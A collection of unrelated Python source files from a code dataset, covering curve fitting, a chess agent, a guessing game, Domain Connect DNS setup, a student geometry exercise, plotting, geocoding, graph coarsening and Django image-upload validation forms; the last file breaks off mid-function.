np.min(y) + pkpk / 2\n amplitude = 0.5 * pkpk\n T2 = 0.5 * (np.max(x) - np.min(x))\n freqs = np.fft.rfftfreq(len(x), x[1] - x[0])\n fft = np.fft.rfft(y)\n fft[0] = 0\n idx_max = np.argmax(np.abs(fft))\n frequency = freqs[idx_max]\n phase = np.angle(fft[idx_max])\n p0 = (\n offset,\n amplitude,\n T2,\n frequency,\n phase,\n )\n popt, pcov = curve_fit(\n _func,\n x,\n y,\n p0=p0,\n )\n perr = np.sqrt(np.diag(pcov))\n return popt, perr\n","sub_path":"ramsey_single.py","file_name":"ramsey_single.py","file_ext":"py","file_size_in_byte":14147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"418701756","text":"from chess.chess import ChessBoard\nfrom vnet import Network\nfrom agent import Agent\nfrom tools import version\nfrom MCTS import Node\nimport numpy as np\n\n\ndef match(agent0, agent1, stdout=False):\n\t_, x, o = 0, -1, 1\n\tboard = np.array([[_, _, _, _, _, _, _, _],\n\t [_, _, x, _, _, _, _, _],\n\t [x, x, _, o, x, _, _, _],\n\t [x, x, o, x, x, _, x, _],\n\t [x, o, x, o, x, x, o, _],\n\t [x, o, o, x, x, x, x, x],\n\t [x, o, o, o, x, o, _, _],\n\t [_, _, x, o, x, x, _, _]])\n\tboard = ChessBoard(board)\n\troot0, root1 = Node(), Node()\n\tcurrent_player = 1\n\twhile not board.is_finish():\n\t\tagent = agent0 if current_player == -1 else agent1\n\t\troot = root0 if current_player == -1 else root1\n\t\tif stdout:\n\t\t\tagent.analysis(board, current_player)\n\t\tprint('root:', root.N)\n\t\taction = agent.play(board, current_player, root=root)\n\t\tboard.move(action, current_player)\n\t\troot0.move_root(action)\n\t\troot1.move_root(action)\n\t\tif stdout:\n\t\t\tprint('x' if current_player == -1 else 'o')\n\t\t\tboard.out()\n\t\t\tprint('=============================')\n\t\tcurrent_player = -current_player\n\treturn board\n\n\ndef contest(agent0, agent1, match_number=100):\n\twin_cnt = 0\n\t_agent0, _agent1 = agent0, agent1\n\tfor cnt in range(match_number):\n\t\t_agent0, _agent1 = _agent1, _agent0\n\t\tif _agent0 == agent0:\n\t\t\tprint('x')\n\t\telse:\n\t\t\tprint('o')\n\t\tboard = match(_agent0, _agent1)\n\t\tv = board.evaluate()\n\t\twinner = None if not v else _agent0 if v < 0 else _agent1\n\t\tif winner == agent0:\n\t\t\twin_cnt += 1\n\t\tprint('contest %d %.3f' % (cnt + 1, win_cnt / (cnt + 1)))\n\treturn win_cnt / match_number\n\n\ndef main():\n\tnet0 = Network('train', bn_training=False, use_GPU=False)\n\tnet0.restore()\n\tnet1 = Network('vnet' + version(6), bn_training=False, use_GPU=False)\n\tnet1.restore()\n\tagent0 = Agent(net0)\n\tagent1 = Agent(net1)\n\t# contest(agent0, agent0)\n\tmatch(agent0, agent0, stdout=True)\n\n\n# contest(agent0, agent1)\n\n\nif __name__ == '__main__':\n\tmain()\n# profile.run('main()', sort=1)\n","sub_path":"match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"511647786","text":"from PIL import Image\nimport os\n\nattr = \\\n {\n \"Sex?(M/F)\": [\"M\",\"F\"],\n \"Eye Color?\": [\"brown\",\"blue\"],\n \"Hair color?\": [\"dark\",\"blonde\"],\n \"Shirt color?\": [\"white\",\"blue\",\"yellow\",\"pink\",\"red\"],\n \"Ethinicity?\": [\"white\",\"black\"],\n \"Profession?\": [\"doctor\",\"carpenter\",\"student\",\"cook\",\"dancer\",\"soccer player\",\"police\",\"gaming\",\"none\"]\n }\ncharInfo = [\n [1,\"F\", \"dark\", \"brown\", \"white\", \"white\", \"doctor\"],\n [2,\"M\", \"dark\", \"blue\", \"blue\", \"white\", \"carpenter\"],\n [3,\"M\", \"blonde\", \"brown\", \"blue\", 
\"white\", \"none\"],\n [4,\"M\", \"blonde\", \"blue\", \"yellow\", \"white\", \"student\"],\n [5,\"F\", \"blonde\", \"blue\", \"pink\", \"white\", \"cook\"],\n [6,\"F\", \"blonde\", \"blue\", \"white\", \"white\", \"none\"],\n [7,\"F\", \"dark\", \"blue\", \"pink\", \"white\", \"dancer\"],\n [8,\"F\", \"dark\", \"brown\", \"red\", \"black\", \"none\"],\n [9,\"M\", \"dark\", \"brown\", \"red\", \"black\", \"soccer player\"],\n [10,\"M\", \"blonde\", \"blue\", \"blue\", \"white\", \"police\"],\n [11,\"M\", \"dark\", \"blue\", \"blue\", \"white\", \"gaming\"],\n [12,\"F\", \"blonde\", \"brown\", \"blue\", \"white\", \"none\"]\n ]\n\n\ndef askQuestions():\n qs = attr.copy()\n sub = charInfo.copy()\n while sub.__len__() > 1:\n count = 1\n for q,a in qs.items():\n print(str(count) + '.' + q)\n count = count+1\n print('Pick a question to answer!')\n qnum = input('>')\n qnum = int(qnum)-1\n foundQ = list(qs.keys())[qnum]\n\n for j in qs[foundQ]:\n toCompare = [y for x in sub for y in x]\n if j in toCompare:\n ans = input('>'+j.capitalize()+'?')\n if ans == 'Y' or ans == 'y':\n if j in qs[foundQ]:\n sub = [per for per in sub if j in per]\n del qs[foundQ]\n break\n\n print(sub)\n img = Image.open(os.path.dirname(__file__)+\"/\"+str(sub[0][0]) + '.jpg')\n img.show()\n\n\n\n# img = mpimg.imread(sub[0][0] + '.jpg')\n# imgplot = plt.imshow(img)\n# plt.show()\n\naskQuestions()\n","sub_path":"phase2.py","file_name":"phase2.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"565336709","text":"import json\nimport os.path\nimport sys\n\nimport requests\nfrom domainconnect import DomainConnect, DomainConnectAsyncCredentials\nfrom builtins import input\nimport webbrowser\n\ndc = DomainConnect()\n\n\ndef main(domain, settings='settings.txt'):\n # get Domain Connect config\n try:\n config = dc.get_domain_config(domain)\n except NoDomainConnectRecordException or NoDomainConnectSettingsException:\n return \"Domain doesn't support Domain Connect.\"\n\n # form consent url\n params = {\n 'IP': '0.0.0.0'\n }\n if config.providerName.lower() in ['godaddy', 'secureserver']:\n context = dc.get_domain_connect_template_async_context(\n domain=domain,\n provider_id='domainconnect.org',\n service_id_in_path=True,\n service_id='dynamicdns',\n params=params,\n redirect_uri='https://dynamicdns.domainconnect.org/ddnscode'\n )\n else:\n context = dc.get_domain_connect_template_async_context(\n domain=domain,\n provider_id='domainconnect.org',\n service_id=['dynamicdns',],\n params=params,\n redirect_uri='https://dynamicdns.domainconnect.org/ddnscode'\n )\n\n webbrowser.open(context.asyncConsentUrl, autoraise=True)\n code = input(\"Please open\\n{}\\nand provide us the access code:\".format(context.asyncConsentUrl))\n\n tries = 1\n while not code and tries < 4:\n tries += 1\n code = input(\"Access code cannot be empty. 
Please retry: \")\n if not code:\n return \"Could not setup domain without an access code.\"\n\n context.code = code\n context = dc.get_async_token(context, DomainConnectAsyncCredentials(\n client_id='domainconnect.org',\n client_secret='inconceivable',\n api_url=config.urlAPI\n ))\n\n # store domain settings\n mode = 'r+'\n if not os.path.exists(settings):\n mode = 'w+'\n with open(settings, mode) as settings_file:\n try:\n existing_config = json.load(settings_file)\n except ValueError:\n existing_config = {}\n settings_file.seek(0)\n settings_file.truncate()\n existing_config.update({\n domain: {\n 'provider_name': config.providerName,\n 'url_api': config.urlAPI,\n 'access_token': context.access_token,\n 'refresh_token': context.refresh_token,\n 'iat': context.iat,\n 'access_token_expires_in': context.access_token_expires_in\n }\n })\n json.dump(existing_config, settings_file, sort_keys=True, indent=1)\n return \"Domain {} has been succesfully configured.\".format(domain)\n return \"Could not store domain config.\"\n","sub_path":"dyndns/domain_setup.py","file_name":"domain_setup.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"647888765","text":"\"\"\"\n(quote ((section MIPI15.1)(groupe )\n (date \"Wed Sep 27 17:39:54 CEST 2017\")(time \"1506526794\")\n (id1 \"3701204\")(nom1 \"ERGIN\")(prenom1 \"Erkan\")\n (mel1 \"erg.erkn@gmail.com\")\n (id2 \"3700131\")(nom2 \"AHAMADA\")(prenom2 \"Soudaissi\")\n (mel2 \"soudaissi@outlook.fr\")))\n\n\nComment a-t-il calcule volume_tetraedre(2.1,2.2,2.3,2.4,2.5,2.6)?\nN'a pas fait ex 2.4\nsablier pas fait (a peine commence)\n\"\"\"\n\nimport sys\nsys.path.append(\"/home/agrospel/logiciel/MrPython/mrpython/\")\nfrom studentlib.gfx.image import *\nfrom studentlib.gfx.img_canvas import *\n\nprint(\"Interpretation:\")\n\nimport math\ndef volume_tetraedre(a,b,c,d,e,f):\n \"\"\"number**6->float\n hypothese a>=0 and b>=0 and c>=0 and d>=0 and e>=0 and f>=0\n retourne le volume d'un tetraedre\"\"\"\n x=a**2+b**2-d**2\n y=b**2+c**2-e**2\n z=a**2+c**2-f**2\n p=4*a**2*b**2*c**2\n q=(a**2*x**2)+(b**2*z**2)+(c**2*y**2)\n r=x*y*z\n return (1/12)*math.sqrt(p-q+r)\n\n#jeux de test\n\nassert volume_tetraedre(1,1,1,1,1,1)==0.11785113019775792\nassert volume_tetraedre(2,2,2,2,2,2)==0.9428090415820634\nassert volume_tetraedre(2.1,2.2,2.3,2.4,2.5,2.6)==1.4820021906379073\n\ndef volume_tetraedre_regulier(g):\n \"\"\"number->float\n hypothese g>=0\n retourne le volume d'un tetradre regulier\"\"\"\n x=g**2+g**2-g**2\n y=g**2+g**2-g**2\n z=g**2+g**2-g**2\n p=4*g**2*g**2*g**2\n q=(g**2*x**2)+(g**2*z**2)+(g**2*y**2)\n r=x*y*z\n return (1/12)*math.sqrt(p-q+r)\n\n#jeux de test\n\nassert volume_tetraedre_regulier(1)==0.11785113019775792\nassert volume_tetraedre_regulier(2)==0.9428090415820634\nassert volume_tetraedre_regulier(3)==3.181980515339464\n\n#Exercice 2.4\n\ndef f(n1, n2, n3):\n \"\"\"Number*Number*Number->str\n retourne un cas parmi 6 selon les valeurs de n1, n2 et n3.\"\"\"\n if n1 < n2 and n2 < n3:\n return 'cas 1'\n elif n1 < n3 and n3 < n2:\n return 'cas 2'\n elif n2 < n1 and n1 < n3:\n return 'cas 3'\n elif n2 < n3 and n3 < n1:\n return 'cas 4'\n elif n3 < n1 and n1 < n2:\n return 'cas 5'\n else:\n return 'cas 6'\n\n#jeux de test\n\nassert f(1,2,3)=='cas 1'\nassert f(1,7,5)=='cas 2'\nassert f(4,3,8)=='cas 3'\nassert f(10,5,8)=='cas 4'\nassert f(13,14,5)=='cas 5'\nassert f(1,1,1)=='cas 6'\n\n#Exercice 2.7\n\ndef sablier(x0,y0,l,h):\n \"\"\"float**4->Image\n hypothese 
-1<=x0<=1 and -1<=y0<=1 and 0<=l<=2 and 0<=h<=2\n    returns an hourglass whose lower-left corner is at (x0, y0)\"\"\"\n\n    # lower triangle (base at y0, apex at the centre; the original passed x0+h\n    # for the base width, which should be x0+l)\n    triangle_inferieur = fill_triangle(x0, y0, x0+l, y0, x0+l/2, y0+h/2)\n\n    # upper triangle (reconstructed as the mirror of the lower one; the\n    # original call was left incomplete)\n    triangle_superieur = fill_triangle(x0, y0+h, x0+l, y0+h, x0+l/2, y0+h/2)\n\n    figure = overlay(triangle_inferieur, triangle_superieur)\n\n    show_image(figure)\n\nsablier(-0.5,0.5,0.5,0.5)\n","sub_path":"monitorat/1I001-2/15.1/rendu2/ergin-ahamada-1506526794.py","file_name":"ergin-ahamada-1506526794.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"406191396","text":"import matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom matplotlib.ticker import MaxNLocator\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nsns.set(font_scale=1.2)\nmpl.rcParams['figure.dpi'] = 300\n\ndf = pd.read_csv('neat-results.csv')\ndf['gen'] = df['gen'].apply(lambda x: x + 1)\ndf['EA'] = 'neat'\n\ndf2 = pd.read_csv('neuro-results.csv')\ndf2['gen'] = df2['gen'].apply(lambda x: x + 1)\ndf2['EA'] = 'neuro'\n\nenemy0 = pd.concat([df.loc[df['enemy_group'] == 0], df2.loc[df2['enemy_group'] == 0]])\nenemy1 = pd.concat([df.loc[df['enemy_group'] == 1], df2.loc[df2['enemy_group'] == 1]])\n\nax = sns.lineplot(data=enemy0, x='gen', y='value', hue='EA', style='metric')\nax.set(xlabel='generation', ylabel='fitness', title='enemies [1,2,4,7]')\nax.xaxis.set_major_locator(MaxNLocator(integer=True))\nplt.tight_layout()\nplt.savefig('results-enemy-group-0.png')\n\nplt.cla()\n\nax = sns.lineplot(data=enemy1, x='gen', y='value', hue='EA', style='metric')\nax.set(xlabel='generation', ylabel='fitness', title='enemies [3,6,7,8]')\nax.xaxis.set_major_locator(MaxNLocator(integer=True))\nplt.tight_layout()\nplt.savefig('results-enemy-group-1.png')\n","sub_path":"plot_results.py","file_name":"plot_results.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"351861033","text":"import json\nfrom urllib import urlencode\nimport urllib2\n\nfrom compass import model\n\nclass OSMap(model.Service):\n\turl = 'http://nominatim.openstreetmap.org/search?'\n\n\tdef __init__(self, ua):\n\t\t\"\"\"\n\t\t1 req/sec minimum between reqs for osm\n\n\t\tua User-Agent string\n\t\t\"\"\"\n\t\tself.ua = ua\n\n\tdef get(self, location):\n\t\ttry:\n\t\t\tqs = urlencode({'q':location.encode('utf-8'),'format':'json'})\n\t\t\treq = urllib2.Request(self.url+qs)\n\t\t\treq.add_header('User-Agent', self.ua)\n\t\t\tpage = urllib2.urlopen(req)\n\t\t\tobj = json.loads(page.read())\n\t\t\tlat = float(obj[0]['lat'])\n\t\t\tlng = float(obj[0]['lon'])\n\t\t\treturn (lat,lng)\n\t\texcept Exception:\n\t\t\treturn 0\n","sub_path":"env/Lib/site-packages/compass/services/openstreetmap.py","file_name":"openstreetmap.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"367889621","text":"#!/usr/bin/env python3\n\n# Copyright (c) 2019, Alchemy Meister\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and 
","sub_path":"env/Lib/site-packages/compass/services/openstreetmap.py","file_name":"openstreetmap.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"367889621","text":"#!/usr/bin/env python3\n\n# Copyright (c) 2019, Alchemy Meister\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"Read and persist configuration values from an INI file in the data folder.\"\"\"\nimport configparser\nimport os\n\nclass ConfigReader:\n    DATA_FOLDER = 'data'\n\n    values = {}\n\n    def __init__(self, filename):\n        self.path = os.path.join(ConfigReader.DATA_FOLDER, filename)\n        self.parser = configparser.ConfigParser()\n        try:\n            self.parser.read(self.path)\n        except configparser.Error as exception:\n            print(\n                'Error reading config data from {}. Error: {}'.format(\n                    self.path, exception\n                )\n            )\n\n    def get_property(self, section, property_string, default_value):\n        try:\n            if isinstance(default_value, bool):\n                value = self.parser.getboolean(section, property_string)\n            else:\n                value = self.parser.get(section, property_string)\n        except configparser.Error:\n            # fall back to the default and persist it below\n            value = default_value\n\n        if section not in self.parser.sections():\n            self.parser.add_section(section)\n        self.parser.set(section, property_string, str(value))\n        return value\n\n    def set_property(self, section, property_string, value):\n        self.parser.set(section, property_string, str(value))\n\n    def add_comment(self, comment):\n        if 'Comments' not in self.parser.sections():\n            self.parser.add_section('Comments')\n        self.parser.set('Comments', '; ' + comment, \"\")\n\n    def write(self):\n        with open(self.path, 'w') as w_file:\n            self.parser.write(w_file)\n
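\n# Illustrative usage (file name and keys are hypothetical):\n#   config = ConfigReader('settings.ini')\n#   debug = config.get_property('general', 'debug', False)  # seeds the key with the default on first read\n#   config.set_property('general', 'debug', True)\n#   config.write()\n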
","sub_path":"config/config_reader.py","file_name":"config_reader.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"569196852","text":"import sys\n\n# https://practice.geeksforgeeks.org/problems/parenthesis-checker/0\n\n\n# Given an expression string exp. Examine whether the pairs and the orders\n# of “{“,”}”,”(“,”)”,”[“,”]” are correct in exp.\n# For example, the program should print 'balanced' for exp = “[()]{}{[()()]()}”\n# and 'not balanced' for exp = “[(])”\n\n###############################################################################\n\nstack = []\n\ndef push(x):\n    stack.append(x)\n    return\n\ndef pop():\n    return stack.pop()\n\ndef is_balanced(s):\n    stack.clear()  # reset the shared stack so repeated calls start clean\n    for ch in s:\n        if ch == '{' or ch == '(' or ch == '[':\n            push(ch)\n        else:  # ch is a closing bracket: '}', ')' or ']'\n            if not stack:  # closer with no opener left to match\n                return False\n            from_stack = pop()\n            if ch == '}' and from_stack != '{': return False\n            if ch == ')' and from_stack != '(': return False\n            if ch == ']' and from_stack != '[': return False\n    return len(stack) == 0\n\n###############################################################################\n\nif __name__ == \"__main__\":\n\n    test_inputs = []\n    test_inputs.append((\"{([])}\", True))\n    test_inputs.append((\"()\", True))\n    test_inputs.append((\"([]\", False))\n\n    # Run is_balanced on the sample inputs\n    for inputs, results in test_inputs:\n        print(f'{inputs}')\n        tf = is_balanced(inputs)\n        print(f\"{tf} expected: {results}\\\\n\")\n\n","sub_path":"interview-prep/geeks_for_geeks/stack_and_queue/parenthesis_checker.py","file_name":"parenthesis_checker.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"149518944","text":"# written by Yangyu GAO, z5223548\n\nfrom surprise import KNNWithMeans\nfrom surprise import Dataset\nimport pandas as pd\nimport numpy as np\n\n\ndef read_file(path):\n    header = ['user_id', 'item_id', 'rating', 'timestamp']\n    # read data files\n    file = pd.read_csv(path, sep='\t', names=header)\n\n    file = file.drop(['timestamp'], axis=1)\n\n    # get total users and total items\n    user = file.user_id.unique().shape[0]\n    item = file.item_id.unique().shape[0]\n\n    return file, user, item\n\n\nif __name__ == \"__main__\":\n    data_path = './ml-100k/u.data'\n    df, n_users, n_items = read_file(data_path)\n\n    data = Dataset.load_builtin('ml-100k')\n\n    # Retrieve the trainset.\n    trainset = data.build_full_trainset()\n\n    sim_options1 = {\n        'name': 'pearson_baseline',\n        'user_based': True\n    }\n\n    sim_options2 = {\n        'name': 'pearson_baseline',\n        'user_based': False\n    }\n\n    algo1 = KNNWithMeans(sim_options=sim_options1)\n    algo1.fit(trainset)\n\n    algo2 = KNNWithMeans(sim_options=sim_options2)\n    algo2.fit(trainset)\n\n    user_item_result = np.zeros((df.shape[0], 2))\n    flag = 0\n    for row in df.itertuples():\n        user_item_result[flag][0] = algo1.predict(str(row[1] - 1), str(row[2] - 1), r_ui=(row[3]), verbose=False).est\n        user_item_result[flag][1] = algo2.predict(str(row[1] - 1), str(row[2] - 1), r_ui=(row[3]), verbose=False).est\n        flag += 1\n    final_data = df.assign(user_pre=user_item_result[:, 0], item_pre=user_item_result[:, 1])\n    final_data.to_csv(r'ratings.csv', index=False)\n
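\n# Note (illustrative): surprise's predict() takes raw ids as strings, e.g.\n#   algo1.predict('196', '242').est  # user-based estimate for one (user, item) pair\n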
","sub_path":"cf_for_mlp.py","file_name":"cf_for_mlp.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"290973041","text":"from __future__ import division\n\nimport torch\n\n\nclass Graclus(object):\n    \"\"\"Converts an adjacency matrix to :obj:`level` coarsened graphs saved in\n    :obj:`data['adjs']` based on the `\"Convolutional Neural Networks on Graphs\n    with Fast Localized Spectral Filtering\"\n    <https://arxiv.org/abs/1606.09375>`_ paper.\n\n    Args:\n        level (int): Number of coarsened graphs to compute.\n            (default: :obj:`1`)\n\n    :class:`Graclus` and pseudo-coordinate transforms can be composed:\n\n    Example:\n\n        >>> Compose([Graclus(4), CartesianAdj()])\n    \"\"\"\n\n    def __init__(self, level=1):\n        self.level = level\n\n    def __call__(self, data, rid=None):\n        adj, position = data.adj, data.position\n\n        adjs, positions, perm = graclus(adj, position, self.level, rid)\n\n        data.input = perm_input(data.input, perm)\n        data.adj = None\n        data.add('adjs', adjs)\n        data.position = None\n        data.add('positions', positions)\n\n        return data\n\n\ndef adj_distance(adj, position):\n    # Gaussian edge weights computed from squared pairwise node distances.\n    n = adj.size(0)\n    index = adj._indices()\n    row, col = index\n    start, end = position[row], position[col]\n    dist = end - start\n    dist = (dist * dist).sum(1)\n    std = dist.sqrt().std()\n    std = std * std\n    weight = torch.exp(dist / (-2 * std))\n    return torch.sparse.FloatTensor(index, weight, torch.Size([n, n]))\n\n\ndef graclus(adj, position, level, rid=None):\n    adjs = [adj]\n    positions = [position]\n    clusters = []\n    for _ in range(level):\n        adj_d = adj_distance(adj, position)\n\n        cluster, cluster_full, singleton = normalized_cut(adj_d, rid)\n        rid = None\n        clusters.append(cluster_full)\n\n        # Compute new adjacency.\n        adj = cluster_adj(adj, cluster)\n        adjs.append(adj)\n\n        # Compute new positions.\n        position = cluster_position(position, cluster_full, singleton)\n        positions.append(position)\n\n    # Permute inputs, adjacencies and positions.\n    perms = compute_perms(clusters)\n\n    adjs = [perm_adj(adjs[i], perms[i]) for i in range(len(perms))]\n    positions = [perm_input(positions[i], perms[i]) for i in range(len(perms))]\n\n    return adjs, positions, perms[0]\n\n\ndef normalized_cut(adj, rid=None):\n    n = adj.size(0)\n    rid = torch.randperm(n) if rid is None else rid\n    cluster = torch.LongTensor(n).fill_(-1)\n\n    row, col = adj._indices()\n    weight = adj._values()\n\n    # Fix graphs with self-loops.\n    mask = row != col\n    row, col, weight = row[mask], col[mask], weight[mask]\n\n    one = weight.new(weight.size(0)).fill_(1)\n    degree = 1 / weight.new(n).fill_(0).scatter_add_(0, row, one)\n    weight = weight * (degree[row] + degree[col])\n\n    # Sort by weight.\n    weight, perm = weight.sort(dim=0, descending=True)\n    row = row[perm]\n    col = col[perm]\n\n    # Sort by rid.\n    _, perm = rid[row].sort()\n    row = row[perm]\n    col = col[perm]\n\n    # Find cluster values.\n    count = 0\n    while row.dim() > 0:\n        cluster[row[0]] = count\n        cluster[col[0]] = count\n\n        mask = (row != row[0]) & (row != col[0])\n        mask &= (col != row[0]) & (col != col[0])\n\n        row = row[mask]\n        col = col[mask]\n\n        count += 1\n\n    # Append singleton values to the end.\n    singleton = cluster == -1\n    num_singletons = singleton.sum()\n    if num_singletons > 0:\n        index = torch.arange(count, count + num_singletons).long()\n        cluster[singleton] = index\n        cluster_full = torch.cat([cluster, index], dim=0)\n        return cluster, cluster_full, singleton\n    else:\n        return cluster, cluster, singleton\n\n\ndef cluster_adj(adj, cluster):\n    n = cluster.max() + 1\n    row, col = adj._indices()\n    row, col = cluster[row], cluster[col]\n    weight = adj._values()\n    mask = row != col\n    row, col, weight = row[mask], col[mask], weight[mask]\n    index = torch.stack([row, col], dim=0)\n    adj = torch.sparse.FloatTensor(index, weight, torch.Size([n, n]))\n    return adj\n\n\ndef cluster_position(pos, cluster, singleton):\n    dim = pos.size(1)\n    singleton = singleton.repeat(dim).view(dim, -1).t()\n    pos = torch.cat([pos, pos[singleton].view(-1, dim)], dim=0)\n    n = cluster.max() + 1\n    return torch.stack(\n        [\n            pos.new(n).fill_(0).scatter_add_(0, cluster, pos[:, i]) / 2\n            for i in range(dim)\n        ],
        dim=1)\n\n\ndef compute_perms(clusters):\n    n = clusters[-1].max() + 1\n\n    perm = torch.arange(0, n).long()\n    perms = [perm]\n\n    for i in range(len(clusters) - 1, -1, -1):\n        cluster = clusters[i]\n        max_cluster = cluster.max() + 1\n\n        # Append double fake nodes.\n        if max_cluster < n:\n            index = torch.arange(max_cluster, n).long().repeat(2)\n            cluster = torch.cat([cluster, index], dim=0)\n\n        cluster = perm.sort()[1][cluster]\n        _, rid = cluster.sort()\n        n *= 2\n        perm = torch.arange(0, n).long()[rid]\n        perms.append(perm)\n\n    return perms[::-1]\n\n\ndef perm_adj(adj, perm):\n    n = perm.size(0)\n    row, col = adj._indices()\n\n    _, perm = perm.sort()\n    row = perm[row]\n    col = perm[col]\n    index = torch.stack([row, col], dim=0)\n\n    adj = torch.sparse.FloatTensor(index, adj._values(), torch.Size([n, n]))\n    return adj.coalesce()\n\n\ndef perm_input(input, perm):\n    n = input.size(0)\n    num_fake_nodes = perm.size(0) - n\n    size = list(input.size())\n    size[0] = num_fake_nodes\n    input = torch.cat([input, input.new(*size).fill_(0)], dim=0)\n    return input[perm]\n
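\n# Illustrative use of the low-level pipeline (hypothetical toy graph; positions\n# vary so the Gaussian kernel in adj_distance has a non-zero std):\n#   index = torch.LongTensor([[0, 1, 1, 2, 2, 0], [1, 0, 2, 1, 0, 2]])\n#   adj = torch.sparse.FloatTensor(index, torch.ones(6), torch.Size([3, 3]))\n#   pos = torch.FloatTensor([[0, 0], [1, 0], [2, 1]])\n#   adjs, positions, perm = graclus(adj, pos, level=1)  # level + 1 graphs back\n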
","sub_path":"torch_geometric/transforms/graclus.py","file_name":"graclus.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}{"seq_id":"421813692","text":"import re\nfrom django import forms\nfrom .models import Talentgram\nfrom PIL import Image\n\n\nclass TalentgramCreateForm(forms.ModelForm):\n\n    class Meta:\n        model = Talentgram\n        fields = ['added', 'media_type']\n\n    def __init__(self, *args, **kwargs):\n        super(TalentgramCreateForm, self).__init__(*args, **kwargs)\n        self.fields['added'].disabled = True\n\n\nclass TalentgramImageForm(forms.ModelForm):\n\n    class Meta:\n        model = Talentgram\n        fields = ['image']\n\n    def clean_image(self):\n        # Enforce image size maximums and minimums:\n        # disallow images that are too large, for the sake of page-load times and storage space;\n        # disallow images that are too small, for quality standards.\n        data = self.cleaned_data['image']\n        im = Image.open(data)\n        width = im.size[0]\n        height = im.size[1]\n        is_horizontal = width > height\n        is_vertical = width < height\n        is_square = width == height\n        data_as_string = str(data)\n        ok_extensions = data_as_string.lower().endswith(('.png', '.jpg', '.jpeg', '.gif'))\n        if not ok_extensions:\n            raise forms.ValidationError('File must be a jpg, png or gif and filename must have an extension')\n        elif width > 1200:\n            raise forms.ValidationError(\"Image width must be 1200px or less\")\n        elif height > 800:\n            raise forms.ValidationError(\"Image height must be 800px or less\")\n        elif is_horizontal and width < 400:\n            raise forms.ValidationError(\"Image is only %i wide. Horizontal images must be at least 400px wide\" % width)\n        elif is_vertical and height < 400:\n            raise forms.ValidationError(\"Image is only %i tall. Vertical images must be at least 400px tall\" % height)\n        elif is_square and width < 400:\n            raise forms.ValidationError(\"Image is %i x %i. Square images must be at least 400 x 400\" % (width, height))\n        return data\n\n\nclass TalentgramThumbForm(forms.ModelForm):\n\n    class Meta:\n        model = Talentgram\n        fields = ['thumbnail']\n\n    def clean_thumbnail(self):\n        data = self.cleaned_data['thumbnail']\n        im = Image.open(data)\n        width = im.size[0]\n        height = im.size[1]\n        data_as_str = str(data)\n        ok_extensions = data_as_str.lower().endswith(('.png', '.jpg', '.jpeg', '.gif'))\n        if not ok_extensions:\n            raise forms.ValidationError('File must be a jpg, png or gif and filename must have an extension')\n        elif width != height:\n            raise forms.ValidationError(\"Image must be a perfect square\")\n        elif width < 400:\n            raise forms.ValidationError(\"Image is %i x %i. Thumbnail must be at least 400 x 400\" % (width, height))\n        return data\n\n\nclass TalentgramEmbedForm(forms.ModelForm):\n\n    class Meta:\n        model = Talentgram\n        fields = ['embed']\n\n    def clean_embed(self):\n        # look for instagram embed script and remove it\n        data = self.cleaned_data['embed']\n        pattern = r'((